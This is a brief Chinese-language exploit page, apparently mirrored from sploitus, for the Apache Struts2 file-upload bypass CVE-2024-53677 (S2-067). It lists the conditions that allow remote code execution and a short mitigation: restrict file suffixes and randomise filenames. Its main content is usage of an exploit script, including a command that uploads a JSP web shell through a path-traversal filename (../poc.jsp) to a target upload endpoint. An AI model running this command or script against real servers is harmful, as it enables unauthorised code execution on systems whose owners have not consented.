Share
## https://sploitus.com/exploit?id=A26B9080-5D5D-5B64-8F51-96585BF4C4A7
# POC来自
https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/

# RCE条件
1.对危险类型后缀名无限制  
2.上传文件时从上传参数中获取文件名  
因此缓释修复也很简单,限制后缀名、使用自定义随机文件名称等  

# 脚本使用
```
python3 s2-067.py -h  
```
<img width="782" alt="image" src="https://github.com/user-attachments/assets/f8defccf-f48b-452b-90b4-4bb4f03b4cd6" />


```
python3 s2-067.py -u http://localhost:28080/uploadFile -filename ../poc.jsp -file 2.jsp -type s
```
<img width="783" alt="image" src="https://github.com/user-attachments/assets/aa6fe12a-2dfe-461a-8aca-0bb00c45a79c" />